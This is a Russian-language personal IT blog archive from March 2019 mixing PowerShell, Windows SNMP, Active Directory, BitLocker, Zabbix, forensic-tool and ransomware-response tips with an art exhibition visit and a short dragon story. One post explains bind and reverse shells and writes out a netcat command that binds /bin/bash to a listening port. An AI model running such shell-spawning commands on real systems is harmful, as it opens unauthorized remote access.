Wednesday, 27 March 2019

Powershell полезности.

Всем привет.

Есть возможность включить простейший мониторинг изменения содержимого текстового файла. Например файла журнала. Powershell рулит.

Пишем следующее:
Get-Content d:\test.log -Wait -Tail 5

test.log - наш файл журнала 
Tail 5 - показывать последние 5 строк.

При любом добавлении информации в файл test.log она тут же будет отображена в окне Powershell. Есть пару нюансов на выходе если информации в файл будет не добавлена, а наоборот, удалена. В этом случае на выход попадет все что есть в журнале. Также неадекватно себя ведет вывод если добавляется не символ, а только пробел. Как вы понимаете, такое поведение характерно в том случае если журнал изменяется вручную, с помощью редактора, что может служить сигналом о преднамеренном вмешательстве в содержимое файла.

Еще пару полезностей для вывода в Powershell:

- ключик Paging - постраничный вывод, аналог "more" в cmd.

Get-Process | Out-Host -Paging

- ключик PassThru - передача данных по конвейеру дальше из Out-GridView.

Начиная 3-й версии PowerShell Out-GridView поддерживает ключ PassThru, позволяющий передать полученные данные дальше по конвейеру. Например, можно вывести список процессов, в графической оснастке отобрать нужные и передать их командлету Stop-Process, который остановит выбранные процессы:

Get-Process | Out-GridView -PassThru | Stop-Process

Это все.

Saturday, 23 March 2019

Современное искусство.

Привет всем.

Выставка 20-ти номинантов пятого конкурса на соискание Премии Pinchuk Art Centre 2018 - общенациональной премии, которая присуждается украинским художникам в возрасте до 35 лет. Шорт-лист (short-listed set) был выбран отборочной комиссией из более чем 650 заявок, полученных от молодых украинских художников со всех регионов Украины и других стран мира. Каждая работа будет специально создана для этой выставки, формируя экспозицию из 20 индивидуальных пространств, представляющих самостоятельное художественное высказывание.

По случаю вечерней прогулки про Хрещатику в районе Бессарабки и имея в запасе пару часов до поезда решил и я посетить этот центр. Тем более что там стояла очередь на входе из 30 человек. В основном молодежь. Т.е. центр надо считать популярным местом для столичных людей. Раз такое дело то идем и мы.

На входе рамка-металлодетектор и вежливый досмотр личных вещей, без фанатизма. Не понимаю зачем, возможно были какие то эксцессы ранее. Изымают все чем можно вести фото видео съемку, режущие предметы. Смартфоны оставляют. Чтобы ребята на входе не скучали я решил им оставить свой пакет, как в камере хранения, а ребята были не против.)

Итак поднимаемся  на 4-й этаж. Почему 4-й? Не знаю, поехал лифтом за кампанию со студентами. Им, мол, сказали что все самое интересное на 4-м.

Приехали, комнаты направо-налево, притушенный свет, занавесы, инсталляции, слайды, вещи на полу, порванная лента под ногами, пустые бутылки в углу, картины (взрыв цвета, без фокуса) на стенах, фотографии на стенах, старый телевизор показывающий Тома-и-Джери по кругу, раскладушка с грязными вещами,... если вы не поняли это я уже описываю экспозиции номинантов прошлого года. Почти в каждом зале есть Медиатор. Медиатор это девушка или парень которые готовы сделать усилие и попытаться лаконично донести вам смысл экспозиции в конкретной комнате. Очень правильное решение, скажу я вам, иначе труба.)

Wednesday, 20 March 2019

Windows 10 и служба SNMP.

Всем привет.

Пришлось на ровном месте потратить два дня на одну задачку.  

Вот потерял я у себя в Windows 10 службу SNMP.  Служба ловушек SNMP есть, а самой службы нет. Почему так? Может обронил где и выключил при инсталляции? Замечу что такой фокус начинается со сборки 1803. У меня сейчас 1809.

Покопался в сети, спецы советуют включить такой компонент как "Протокол SNMP", вроде все просто. А не так, не оказалось такого компонента в перечне моей Windows 10.

Далее находим советы по доинсталлированию протокола SNMP с помощью Powershell:

- проверка доступных SNMP-служб
Get-Service -Name snmp*

- инсталлирование службы SNMP (утверждают что работает для сборки 1803)
Enable-WindowsOptionalFeature -online -FeatureName SNMP

У меня сборка 1809 поэтому ищем дальше. 

Правим ключик реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\
UseWUServer = 0

- проверка доступных SNMP-служб
Get-WindowsCapability  -Online -Name "SNMP*"

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client~~~~0.0.1.0"

ИЛИ

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client*"


Saturday, 16 March 2019

Разница между Get-ADUser и Search-ADAccount.

Всем привет.

Выбирая из AD учетки которые не работали более 90 дней обнаружил интересную статистику по итогам. Как известно такой запрос можно сделать с помощью Get-ADUser или Search-ADAccount.

Пишем:
$d = (Get-Date).AddDays(-90)
$t = New-Timespan –Days 90

Get-ADUser -filter {(enabled -eq "false") -and (lastlogondate -lt $d)} -properties cn,lastlogondate | Select CN,LastLogonDate | measure

ИЛИ

Search-ADAccount –UsersOnly –AccountInactive –TimeSpan $t | sort Name | Select Name,LastLogonDate,DistinguishedName | measure

ИЛИ

Search-ADAccount –UsersOnly –AccountInactive –DateTime $d | sort Name | Select Name,LastLogonDate,DistinguishedName | measure

Так вот в первом запросе итог часто больший чем во втором и третьем. Почему так? А дело  в том что Search-ADAccount всегда выбирает и те учетки по которым входа никогда не было, т.е. у которых поле lastlogondate содержит "пусто".

Поэтому для Get-ADUser надо добавить условие lastlogondate -notlike '*':

Get-ADUser -filter {(enabled -eq "false") -and ((lastlogondate -lt $d) -or (lastlogondate -notlike '*'))} -properties cn,lastlogondate | Select CN,LastLogonDate | measure

На сегодня все.

Электронный ключ к вашему компьютеру.

Всем привет.

Как закрыть доступ к своему компьютеру с помощью электронного ключа?

Просто. До версии Windows 10 существовала штатная утилита syskey, которая после несложных манипуляций записывала вам на флешку файлик, который и являлся электронным ключом. Вставлена флешка при включении - система доступна, а если нет - то недоступна.

В Windows 10 утилита syskey отсутствует. Все построено на сервисе шифрования дисков BitLocker. Плюс к этому ваш ПК должен поддерживать модуль ТРМ  не ниже версии 1.2. Trusted Platform Module (TPM), содержащий в себе криптопроцессор, обеспечивает средства безопасного создания ключей шифрования, способных ограничить использование ключей (как для подписи, так и для шифрования/дешифрования) с той же степенью неповторяемости, что и генератор случайных чисел. 

Поэтому в Windows 10 операция по созданию электронного ключа происходит в три этапа.

Первое, и это естественно, надо включить сам BitLocker для системного диска, например для "С".

Второе, это включить поддержку BitLocker в групповых политиках Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives in the Group Policy window. Двойной клик на "Require Additional Authentication at startup".


И наконец третье. Что еще? Да, вот я долго сам искал фишку почему мой ключ не работает пока не наступил на это третье.

Thursday, 14 March 2019

REVERSE SHELL - удаленная консоль и ее реализация.

Всем привет.

Поговорим про удаленную консоль. Таковая бывает двух видов - REVERSE и BIND.

BIND SHELL - удаленная консоль, когда в роли серверной части выступает удаленная машина, то есть это когда мы сами пошли в гости и получили доступ к чужой консоли.

REVERSE SHELL - удаленная консоль, когда мы выступаем в роли серверной части и вызываем коннект на себя. То есть это когда мы встречаем гостей у себя дома. И когда гости приходят - мы получаем доступ к их консоли.

Как это реализовать?

BIND SHELL. 

1. Для этого на удаленной машине (localhost) выполним команду:

nc -e /bin/bash -nvlp 1337

-e /bin/bash -- команда которую нужно выполнить в случаи удачного подключения, в нашем случае это консоль bash-а которая будет работать интерактивно после подключения.
-n -- numeric-only (использовать только IP-адреса, не использовать dns имена)
-v -- более подробный вывод
-l -- listen-mode (режим слушателя ,который предназначен для входящих соединений)
-p -- порт на котором мы будем слушать

2. На своей машине мы выполним команду:

nc 127.0.0.1 1337

127.0.0.1 - это IP-адрес машины которая ждет подключение
1337 - это порт на котором нас ждут

Когда же применяется BIND SHELL?

А актуален он тогда когда входящие соединения не блокируются сетевыми фаерволами и IP-адрес удаленной машины виден и доступен с любого сегмента сети. К примеру web-сервер на котором размещен сайт всегда имеет выделенный IP-адрес, и мы можем к нему подключиться находясь в глубоком NATе.

Monday, 11 March 2019

Zabbix and LDAP secure authethincation.

Hi everybody.

As you know Zabbix has authethincation methods via Internal, LDAP and HTTP. And how about Secure LDAP? Yes, sure. It can be true also.

So as you can see on the snapshot you have to type in the "LDAP host" field the value as "ldaps://myDC" and in the "Port" field as 636.


If you have a problem with reset authethincation to Internal by Zabbix frontend you can do it in mysql:

mysql -u root -p
UPDATE 'zabbix'.'config' SET 'authentication_type' = '0' WHERE 'config'.'configid' = 1;

See you later.

Sunday, 10 March 2019

Криминалистическая экспертиза цифровых данных.

Всем привет.

Сегодня хочу предложить вам списков технических средств для выполнения криминалистической экспертизы и обработки цифровых данных, которые могут иметь отдельную функциональную нагрузку.

Примеры технических средств выполнения криминалистической копии (создания образа) запоминающих устройств.

Следует руководствоваться рекомендациями, которые определены в разделе 4.2.1 "Copying File from Media" NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response. 

В качестве программных средств создания образа можно использовать:
- утилиты dd и dc3dd для UNIX-систем;
- программы FTK Imager, EnCase Forensic Imager или Redline для Windows-систем:
- программу Belkasoft Evidence Center для Windows, Linux, MacOS, iOS, Android, Windows Phone, Blackberry-систем;
- программу The Sleuth Kit для Windows, MacOS, Linux, Solaris, OpenBSD, FreeBSD-систем.

В качестве программных средств вычисления значений хэш-функций можно использовать:
- программы md5sum или sha256sum для Linux-систем;
- программы Memoryze для Windows и MacOS-систем:
- программу dff для Windows и Linux-систем.

В качестве специализированных программных средств "write-blocker" можно использовать:
- программу dff для Windows и Linux-систем;
- следует руководствоваться рекомендациями, которые определены в разделе 4.2.2 "Data File Integrity" NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response.

Friday, 8 March 2019

Практика с мультимедиа в PDF-документе.

Всем привет.

Небольшая практика по поводу мультимедиа в PDF-документе. Если помните я писал про это здесь

Так вот решил я озвучить один PDF-документ с помощью вставки MP3-треков.Так чтобы читатель при прочтении каждой страницы в фоне слышал соответствующую музыку. Задача ставилась сделать это максимально без участия читателя. Он читает и не должен отвлекаться от приятного чтения. Это можно? Не проблема. 

Проблемы появились  в другом. 

Во первых, если саундтрек запускается при появлении страницы, а прекращается при ее исчезновении(закрытии) с просмотра, то на большом мониторе страниц на просмотр может быть и две. А значит и саундтреки накладываются при звучании. Предлагать читателю самому выключать саундтрек не есть хорошо. И один саунд-трек не вытесняет другой.

Во вторых, для проигрывания мультимедиа (mp3, swf, mp4) необходимо дополнительно и заранее инсталлировать в систему Flash-плеер. Иначе открытый PDF-документ будет надоедать читателю напоминанием об этом.

Следующее. Размер PDF-документа увеличивается ровно на размер мультимедиа. Ок, размеры саунд-треков еще можно вытерпеть, но если внедрять MP4-видеоролик то тут надо десять раз подумать. В сети находил обходной маневр - с помощью дополнительного виджета youtube-widget-for-pdf.swf. Т.е. вы внедряете в свой PDF-документ этот SWF-объект, а уже в нем вставляете код вставки от youtube. Просто и гениально. Непонятно почему это не штатная функция  для PDF-документа. С другой стороны так можно легко вставить  в документ и скрипт вируса. 

Вот такая практика с мультимедиа.


Wednesday, 6 March 2019

Рекомендованное вам от youtube.

Всем привет.

При просмотре роликов в youtube частенько зритель видит в ленте справа подбор роликов со статусом "Рекомендованное вам".

Я лично часто наблюдаю возмущения зрителя в комментариях типа "Почему это мне рекомендуется?" Могу малость порассуждать на эту тему, исходя из своего опыта серфинга в youtube и размещения собственных видероликов.

Итак прежде всего играют роль ключевые слова (теги) по которым конкретный ролик разместил сам автор. Теги вам не видны.

Второе - играет роль в какой Категории размещен этот ролик. Категория вам видна.

Третье - имеет значение само название ролика и что именно занесено в текстовое описание к ролику. Это вам тоже видно. Именно эти блоки индексируются Google-ом.

Допустим вы как пользователь смотрите выбранный вами ролик, а youtube еще до окончания просмотра на основании выше приведенных критериев полагает что еще ряд похожих роликов будут вам интересны. Он вас хочет угадать. Частенько это у него получается. Разработчики не зря же свой хлеб едят, ваш поведенческий алгоритм постоянно изучается и совершенствуется. Также интересно работает кнопка "Показать больше" внизу справа. При ее нажатии youtube пытается разнообразить свою выдачу с учетом ваших предпочтений.

Допустим вам ничего не нравится и вы указываете в url явную ссылку на новый ролик. Даже в этом случае youtube не сдается, и в следующий раз попробует включить его в так называемый "Джем". Причем наполнение джема произойдет в произвольном порядке, плюс к этому сам youtube еще раз попробует вас угадать и случайно добавить что-то от себя. Похоже на игру?) Так оно и есть.

Исходя их этого и появляются странные на ваш взгляд предложения типа "Рекомендованное вам". Согласен, бывают дикие предложения, но это только на первый взгляд.) Примите во внимание что youtube работает на пару с Google-ом, поэтому поиск в Google-е может отразиться и на предложениях youtube. Не забывайте что у вас будет (может быть) совершенно другая картина когда вы находитесь в активной учетке Gmail.

Youtube с вами как бы разговаривает: 
-Вот глянь еще это.
-Это тоже мне?
-Тебе, тебе.
-Почему ты так решил?
-Так глянь сам что ты искал до сих пор, что читал и что пересматривал по несколько раз.

Успехов.

Sunday, 3 March 2019

Как пережить атаку Ransomware?

Всем привет.

По прежнему актуально - как пережить атаку Ransomware? Поэтому совсем короткая инструкция, еще раз от Владислава Радецкого. Перевод мой.

1. Ни в коем случае не переводите деньги. Не платите выкуп!

2. При наявности внешнего HDD снимите образ вашего диск полностью. Если диска не оказалось то скопировать на флешку каталоги в которых были важные документы.

3. Провести дезинфекцию вашей инфицированной системы (отдельная тема).

4. Сперва определите тип Ransomware, для этого необходимо использовать web-портал ID Ransomware. Есть смысл загрузить либо образец зашифрованного файла, либо саму заметку про выкуп, либо адреса email с ransom note.



Friday, 1 March 2019

Про дракона и его принцессу.

Всем привет.

Надыбал недавно на просторах одну притчу про дракона и принцессу. Она была коротенькая и трижды скопированная. Называлась "Принцесса без головы". Мне показалось что автор слишком уж задраматизировал сюжет в свои пару строк и тему, естественно, не раскрыл. Поэтому я решил развить ее, и вот, мой вариант ниже. С весной вас и приятного чтения.

Как водится принцессе одной в замке было скучно, и она часто выходила гулять вокруг озера. По началу дракон волновался что принцесса может заблудиться и не вернуться, но со временем он привык к таким ее вечерним прогулкам и даже торопился составить ей кампанию. Вот и сегодня они сидели на высоком берегу, свесив кто ноги кто лапы, и кидали в озеро камушки.

- А у тебя до меня были другие принцессы? — неожиданно спросила принцесса.

- Конечно, — ответил дракон. — Не так много.

- И где они все? — принцесса судорожно сгребла камень и, не глядя, зашвырнула подальше.

- Как тебе сказать... — дракон помолчал. — Они все закончились. Я их отпустил.

- Это потому, что ты их чувствовал, да? Или это было просто давно?

- Не только, — дракон кинул камушек. Снизу донесся «бултых», треск лодки и проклятия. - Понимаешь, чувствовать других не просто. Вот хочется нежно прижать принцессу к себе и никогда-никогда не отпускать...

- Это я понимаю, — сказала принцесса. Она придвинулась к дракону и нежно прижала к себе его левую лапу. Дракон опасливо покосился.  - Ну и что?

- Довольно скоро принцесса начинает шевелиться и пытается вырваться. Ей хочется чего-то еще, а не только быть нежно прижатой, - с третьей попытки дракон высвободил лапу.

Принцесса вздохнула, и кинула в озеро камушек.


- А ты бы узнал чего ей хочется еще? - добавила принцесса, и опять тихонько прижалась к нему.

- Да я то знаю, - вздохнул дракон. И сделал вид что не заметил. - Все дело в дистанции.

- Какой еще дистанции? - удивленно заметила принцесса чуть не обронив следующий камешек ему прямо на лапу.

- Это трудно объяснить. - ответил дракон. - Ты хочешь прижать ее сильно-сильно, но между нами все равно оcтается дистанция. Поэтому иногда мне дышать становится совсем трудно, а сердцу нестерпимо больно, но я все равно не хочу ее отпускать. Наверное ты и сама знаешь как это бывает – вот он сейчас рядом, а внутри тебя все равно не отпускает. А когда я улетаю у нее остается часть меня.

Версия на печать

Популярное